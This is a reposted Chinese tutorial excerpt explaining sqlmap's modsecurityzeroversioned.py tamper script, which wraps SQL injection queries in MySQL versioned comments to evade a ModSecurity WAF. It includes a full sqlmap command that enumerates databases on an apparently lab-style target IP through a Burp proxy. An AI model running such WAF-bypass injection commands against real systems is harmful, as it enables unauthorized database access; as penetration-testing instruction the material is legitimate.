- modsecurityzeroversioned.py脚本
使用带有数字0的注释(/!00000 /–) 包围整个完整的查询 适用于mysql数据库
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 –dbs –tamper=”modsecurityzeroversioned.py” –proxy=”http://127.0.0.1:8080″ -batch
确认是可以进行这正常注入,我们看看burp抓包效果
Original: https://blog.51cto.com/u_5139878/5406320
Author: kgd529501683
Title: sqlmap从入门到精通-第七章-7-13 绕过WAF脚本-modsecurityzeroversioned&multiplespaces.py
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/517176/
转载文章受原作者版权保护。转载请注明原作者出处!